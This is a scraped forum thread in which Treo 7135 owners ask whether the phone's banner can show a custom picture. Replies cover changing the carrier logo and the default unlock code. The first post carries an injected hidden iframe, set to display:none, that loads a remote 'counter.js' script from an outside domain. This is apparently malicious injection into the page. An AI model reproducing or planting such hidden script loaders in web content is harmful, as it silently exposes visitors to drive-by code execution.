+ Reply to Thread

Banner custom picture . .

I looked through the search on Banners but could not see a reference to this question . . .
    I don't care about putting my name on the Banner ( I already know my name) What I would like to do is have a pic of my dog come up instead of the Verizon logo. My wife's LG Verizon phone has a list of pics to choose from and hers displays moving floating colorful ballons when the flip is open.
    Does the 7135 offer this type of customization?
    Afterall, we are talking one really cute dog here . . :p<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Banner custom picture . .

Originally posted by Expidia
    I looked through the search on Banners but could not see a reference to this question . . .
    I don't care about putting my name on the Banner ( I already know my name) What I would like to do is have a pic of my dog come up instead of the Verizon logo. My wife's LG Verizon phone has a list of pics to choose from and hers displays moving floating colorful ballons when the flip is open.
    Afterall, we are talking one really cute dog here . . :p
    LOL . If it is possible I don't think anyone here has posted that they have accomplished it.
    Please visit my picture site: Robert-O-Rama :)

Re: Banner custom picture . .

Originally posted by Expidia
    Afterall, we are talking one really cute dog here . . :p
    You can change the carrier logo:

http://www.smartphonesource.com/vbul...ht=carrierlogo

But that only shows when you power on/power off the phone.

Jeff
    Jeff
    Tampa FL
    Blackberry 7230 w/ T-Mobile

E-mail: djjefft@aol.com
    AIM: djjefft

Thx Jeff, read it . . . sounds a bit to techy for my abilities and you need to know the unlock codes. Can't believe for a phone of this price we have to look at a boring white screen when you enter the phone mode . . . when some of the new free phones the Mall Rat's carry have options to change the backround or add your own picture.
    Palm III, V>6035>7135>6035>650>700p>755p (on Vzn), Palm's BT Treo Hdset,

The unlock code should be 000000 unless you are with Sprint. As for the boaring screens... the phone is billed as a work or enterprise solution so they limit the gimics they put for more substance like the full Palm OS stuff. You could always have the phone go to the palm app screen when it is opened...

AJaM